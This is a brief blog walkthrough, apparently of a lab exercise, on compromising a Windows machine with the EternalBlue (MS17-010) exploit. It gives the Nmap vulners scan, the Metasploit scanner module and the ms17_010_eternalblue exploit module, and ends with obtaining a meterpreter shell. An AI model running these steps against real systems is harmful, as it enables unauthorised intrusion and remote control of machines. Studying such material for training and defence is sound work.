Hacking Windows OS with EternalBlue

Sumedha Dawadi
Jul 25, 2021

--

EternalBlue is exploit developed by NSA and leaked by the hacking group Shadow broker on April 14,2017.

Scanning the target with Nmap.
nmap -sV — script vulners 10.10.125.120

Scanning if the target is vulnerable to ms17_010
auxiliary(scanner/smb/smb_ms17_010) >

Target is likely to be vulnerable to MS17–010

Let’s load the exploit with proper RHOSTS and LHOST.

use exploit/windows/smb/ms17_010_eternalblue

Let’s exploit.

We got the meterpreter shell. Now, let’s upgrade the shell.
Type shell

We successfully hacked windows os with the help of ms17_010 exploit

--

--